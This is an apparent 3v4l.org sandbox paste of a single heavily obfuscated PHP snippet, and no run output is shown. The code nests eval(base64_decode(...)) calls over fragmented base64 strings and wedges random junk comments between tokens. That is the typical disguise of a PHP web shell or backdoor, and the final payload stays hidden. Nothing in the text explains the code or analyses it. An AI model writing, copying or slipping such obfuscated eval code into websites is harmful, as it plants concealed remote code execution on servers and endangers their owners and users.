3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php /*rKSW<+*/eval/*,k%u*/(/*xo^]=r*/base64_decode/*H:14U~.*/(/*VO)(y}*/'LypCVCZVOSovZXZhbC8qMV8hVz8/Ki8oLyp9Sm46ZFBrfCovYmFzZTY0X2RlY29kZS8qPnszfCovKC8qTkE8QF8qLydMeW9sYWtCOGJTb3ZhV1l2S25VN1RVNGhaU292S0M4cVd5aHBXaScvKj90Qm8qLy4vKkZfajMqLydvdmFYTnpa'/*zau*/./*<BR*/'WFF2S2toTmVueFJLaThvTHlwWWFGWlhMU292SkY5UycvKnxYT0VHKi8uLypiNDhIRGUqLydSVkZWUlZOVUx5cE9jR3d1S2k5Ykx5cFhiVmc2S2k4bmFDY3ZLbScvKn5uNzBDPCovLi8qQjlcbSovJ0FuWWlVcUx5NHZLbTFPY0dOQktp'/*&H~e[*/./*Z^Mbf*/'OG5keWN2S2tCUU1HZFpPRUlxJy8qZmZDRChnKi8uLyp0fjEqLydMeTR2S21wRU1ENGhTV2dxTHlkakp5OHFQRkU2VWpncUx5NHZLaicvKiE4dU9FKUsqLy4vKjFbTVJvJVMqLycwNFZDb3ZKMmxsWnljdkttNWVRV2hJWENvdlhTOHFQ'/*@zjva*/./*\Ta*/'M0V1WWlvdicvKnVrRmN7Ki8uLyosK3plKi8nTHlwVWRUcDRUQ292S1M4cUlUaEFiaW92THlwRFUya3FMeWt2S24nLypxP2AqLy4vKitUPGx4ZCovJ0pxTUdRcEtDb3ZaWFpoYkM4cWQzWmxOQ292S0M4cVhEOCtmU2s5Jy8qXT5VKi8u'/*%]&,*/./*(t||=:A*/'Lyp8REZoQCovJ0tpOXpkSEpwY0hOc1lYTm9aWE12S2laWk9td3RXejBxTHlndktsJy8qUmJfc1AqLy4vKk54SiovJzhwYlNVcUx5UmZVa1ZSVlVWVFZDOHFQMGQ2Y1QwcUwxc3ZLakk5Jy8qWFtdSEMqLy4vKmVdKy1PKi8nYjE0cUx5'/*3,^V*/./*2|&&b*/'ZG9kMk1uTHlwaVpFeDFZQ292TGk4cU1uRTRjRlp2S2knLypXRVJTRmIqLy4vKnl8LUcyKi8nOG5hV1ZuSnk4cVgxbHJiVmh0V0NvdlhTOHFYRlJVUVh4RFFDb3YnLyorUT1dbngqLy4vKl8hVH4qLydMeXBMWkZaN1JTNHFMeWt2S2tw'/*C4np*/./*hsN!U*/'UGIxZzNRbm9xTHk4cVpUMWViMScvKisucV5bdSovLi8qalFuVSovJ2dxTHlrdkttMDNLMGdxTHk4cVh5QjhVa0V6S2k4N0x5bzFWMEZpS2k4PScvKjFONCgqLykvKk40ICovLyo7fjd8Ki8pLypMY09BXm8qLy8qLX1BWSovOy8qaX0sWSov'/*9rz+} }*/)/*3OO=cFl*//*)JHJtgh*/)/*;ZY_M*//*P)~%4G*/;/*hK1Ye5b*/ ?>
Output for 5.2.14 - 7.2.0